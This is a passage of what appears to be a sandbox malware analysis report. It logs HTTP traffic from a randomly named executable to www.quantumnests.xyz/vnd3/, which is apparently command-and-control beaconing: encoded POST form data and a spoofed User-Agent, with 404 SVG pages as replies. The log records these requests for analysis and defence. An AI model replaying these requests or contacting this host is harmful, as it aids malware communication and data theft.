Sep 16, 2024 09:40:04.086828947 CEST | 448 | IN | Data Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                                                  Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
Sep 16, 2024 09:40:04.086951971 CEST | 1236 | IN | Data Raw: 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20
                                                  Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-3l-6.8 25.2h3z"
Sep 16, 2024 09:40:04.086962938 CEST | 224 | IN | Data Raw: 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 32 30 2e 32 20 32 38 32 2e
                                                  Data Ascii: ="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6.8 25.2h3z"/>
Sep 16, 2024 09:40:04.086973906 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22
                                                  Data Ascii: <path class="st2" d="M-390.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-380.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/>
Sep 16, 2024 09:40:04.086986065 CEST | 224 | IN | Data Raw: 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 38 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e
                                                  Data Ascii: 2.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-180.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-170.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/> <path class="st
Sep 16, 2024 09:40:04.092001915 CEST | 1236 | IN | Data Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                                                  Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49734 | 162.0.239.141 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:40:06.052649021 CEST | 814 | OUT | POST /vnd3/ HTTP/1.1
                                                  Host: www.quantumnests.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.quantumnests.xyz
                                                  Referer: http://www.quantumnests.xyz/vnd3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 61 70 48 36 47 76 48 6c 49 67 68 39 43 77 55 41 53 79 7a 69 73 39 67 6d 35 6c 6c 68 50 6e 49 79 48 50 4e 71 34 6a 71 69 7a 74 43 55 69 57 67 31 75 63 78 47 78 43 7a 38 6e 32 63 6d 6d 79 42 45 51 35 74 39 65 76 6b 35 30 43 69 2f 79 5a 43 55 5a 64 65 51 6c 68 56 68 59 52 31 66 45 70 58 44 74 66 64 64 6c 70 75 4f 50 55 42 69 62 4a 52 6e 77 47 31 4f 2b 64 7a 2f 38 6d 37 59 57 73 46 31 47 79 2f 59 31 39 58 59 6d 63 44 4e 64 62 41 77 34 2f 45 6f 6b 6d 49 63 79 76 43 66 47 39 7a 59 2f 33 30 30 45 74 4a 66 4b 64 48 7a 63 33 71 78 36 35 71 66 70 61 62 34 41 70 52 71 62 35 50 68 6b 62 4d 73 69 33 77 74 6b 4c 4b 54 76 53 35 52 37 67 4f 73 4c 77 41 63 6c 73 68
                                                  Data Ascii: prutfR_P=8apH6GvHlIgh9CwUASyzis9gm5llhPnIyHPNq4jqiztCUiWg1ucxGxCz8n2cmmyBEQ5t9evk50Ci/yZCUZdeQlhVhYR1fEpXDtfddlpuOPUBibJRnwG1O+dz/8m7YWsF1Gy/Y19XYmcDNdbAw4/EokmIcyvCfG9zY/300EtJfKdHzc3qx65qfpab4ApRqb5PhkbMsi3wtkLKTvS5R7gOsLwAclsh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49735 | 162.0.239.141 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:40:08.594481945 CEST | 1831 | OUT | POST /vnd3/ HTTP/1.1
                                                  Host: www.quantumnests.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.quantumnests.xyz
                                                  Referer: http://www.quantumnests.xyz/vnd3/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 38 61 70 48 36 47 76 48 6c 49 67 68 39 43 77 55 41 53 79 7a 69 73 39 67 6d 35 6c 6c 68 50 6e 49 79 48 50 4e 71 34 6a 71 69 7a 31 43 56 51 65 67 6e 39 45 78 48 78 43 7a 2f 6e 32 66 6d 6d 79 51 45 51 68 70 39 66 54 53 35 78 47 69 2b 55 56 43 42 59 64 65 61 6c 68 56 73 34 52 6f 43 30 70 34 44 73 7a 5a 64 68 4e 75 4f 50 55 42 69 64 74 52 67 69 2b 31 4d 2b 64 38 2b 38 6d 6e 53 32 73 68 31 47 62 43 59 31 35 59 59 58 38 44 4e 39 72 41 78 4f 44 45 71 45 6d 4b 66 79 76 4b 66 47 68 73 59 2f 36 4e 30 46 5a 77 66 4e 70 48 79 34 69 44 6c 5a 38 79 4f 70 4b 30 39 77 52 50 32 2b 38 69 6b 6e 54 72 76 78 66 72 67 57 50 6f 59 6f 37 30 59 59 30 46 79 4e 45 61 59 30 74 54 6d 43 73 66 48 43 70 46 4a 65 35 56 67 43 6e 31 2b 6c 30 71 50 2f 47 42 68 58 36 61 4a 64 6f 2b 5a 4d 4a 4a 45 78 31 4c 6a 5a 53 4d 39 4f 2f 4c 46 6d 59 68 43 30 72 45 74 59 6a 4f 48 69 71 4a 37 34 6a 36 57 52 42 46 4d 38 52 43 67 42 46 66 34 46 34 61 6a 4e 53 6c 41 4c 36 4f 32 59 6e 70 49 54 61 6e 74 66 4d 6d 54 72 2b 59 71 [TRUNCATED]
                                                  Data Ascii: prutfR_P=[TRUNCATED]
                                                  Sep 16, 2024 09:40:10.208085060 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:09 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                                  Sep 16, 2024 09:40:10.208101988 CEST | 224 | IN | Data Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                                                  Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2
                                                  Sep 16, 2024 09:40:10.208112955 CEST | 1236 | IN | Data Raw: 22 20 64 3d 22 4d 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 31 30 20 33 30 37 2e 36 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 32 30 20 33 30 37 2e
                                                  Data Ascii: " d="M19.8 282.4h-3L10 307.6h3z"/> <path class="st2" d="M29.8 282.4h-3L20 307.6h3z"/> <path class="st2" d="M39.8 282.4h-3L30 307.6h3z"/> <path class="st2" d="M49.8 282.4h-3L40 307.6h3z"/> <path class="st2" d="M59.8 282.4h-3L50
                                                  Sep 16, 2024 09:40:10.208118916 CEST | 1236 | IN | Data Raw: 22 20 64 3d 22 4d 32 33 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 34 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                                                  Data Ascii: " d="M239.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M249.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M259.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M269.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M279.8 282
                                                  Sep 16, 2024 09:40:10.208122969 CEST | 1236 | IN | Data Raw: 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34
                                                  Data Ascii: <path class="st2" d="M459.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M469.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M479.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M489.8 282.4h-3l-6.8 25.2h3z"/> <path class="
                                                  Sep 16, 2024 09:40:10.208132982 CEST | 1236 | IN | Data Raw: 73 74 32 22 20 64 3d 22 4d 38 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 32 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20
                                                  Data Ascii: st2" d="M830 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M820 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M810 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M800 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M790 282.4h-3l-
                                                  Sep 16, 2024 09:40:10.208137989 CEST | 1236 | IN | Data Raw: 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73
                                                  Data Ascii: 25.2h3z"/> <path class="st2" d="M600 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M590 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M580 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M570 282.4h-3l-6.8 25.2h3z"/> <path c
                                                  Sep 16, 2024 09:40:10.208148003 CEST | 1120 | IN | Data Raw: 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20
                                                  Data Ascii: -3l-6.8 25.2h3z"/> <path class="st2" d="M-330.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-320.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-310.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-300.2 282.4h-3l
                                                  Sep 16, 2024 09:40:10.208168983 CEST | 1236 | IN | Data Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                                                  Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                                                  Sep 16, 2024 09:40:10.208178997 CEST | 1236 | IN | Data Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                                                  Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M410 282.4h-
                                                  Sep 16, 2024 09:40:10.208189011 CEST | 1236 | IN | Data Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 32 30
                                                  Data Ascii: <path class="st2" d="M230 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M220 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M210 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M200 282.4h-3l-6.8 25.2h3z"/> <path class="st
                                                  Sep 16, 2024 09:40:10.208203077 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:09 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                                  Sep 16, 2024 09:40:10.208395004 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:09 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  24 | 192.168.2.5 | 49736 | 162.0.239.141 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Sep 16, 2024 09:40:11.140705109 CEST | 528 | OUT | GET /vnd3/?prutfR_P=xYBn5zztkuVfiCwoRQOy2opDl7RgoPyR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERRmF7/bt0PBBiFKuaDRgyJqJJ+MxR9VKTQpRM54mqQi17vQ==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.quantumnests.xyz
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:40:11.717657089 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:40:11 GMT
                                                  Server: Apache
                                                  Content-Length: 18121
                                                  Connection: close
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
